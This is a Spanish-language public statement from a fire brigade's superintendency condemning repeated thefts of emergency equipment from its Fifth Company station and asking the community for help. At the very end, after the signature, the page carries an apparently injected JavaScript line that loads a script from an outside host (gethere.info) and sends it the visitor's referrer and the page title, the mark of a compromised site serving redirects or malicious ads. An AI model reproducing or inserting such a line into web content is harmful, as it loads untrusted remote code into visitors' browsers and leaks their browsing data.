DECLARACIÓN PÚBLICA

Tras los infortunados hechos acaecidos recientemente en  el cuartel de la Quinta Compañía de Bomberos “Bomba Los Pinos,” instalaciones que en tres oportunidades han sido robados insumos bomberiles,  por personas inescrupulosas, que solo busca causar daño a esta institución que por 65 años ha prestado un servicio ininterrumpido y que trabaja de forma directa en socorrer a la comunidad y en especial este cuartel que fue y es un gran anhelo de la comunidad de los Pinos.

Deseamos como Cuerpo de Bomberos, expresar nuestro repudio más profundo a este tipo de conductas,  ya que el material sustraído es utilizado cuando una emergencia se presenta y el robo de esta solo atenta en contra de un trabajo eficiente al momento de producirse una emergencia, por lo antes expuesto, es que la superintendencia ha seguido las vías legales para esclarecer estos tristes y desafortunados hechos, que afectan a la Quinta Compañía y su personal. No obstante lo anterior hacemos un ferviente llamado  a toda  la comunidad quilpueina  cuando sea testigo de un hecho delictual a nuestras instalaciones o personal, pueda colaborar en el esclarecimiento de este tipo de sucesos.

Finalmente, reiteramos que pese a estos lamentables hechos, no claudicaremos como bomberos en el trabajo, que de forma incansable y anónima hemos realizado y seguiremos desarrollando hacia nuestra comunidad cuando nos requiera, teniendo siempre presente que somos una institución que día a día busca seguir creciendo y perfeccionándose, cuestión que ha quedado  de manifiesto en estos 65 años de abnegación y disciplina.

Superintendencia.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;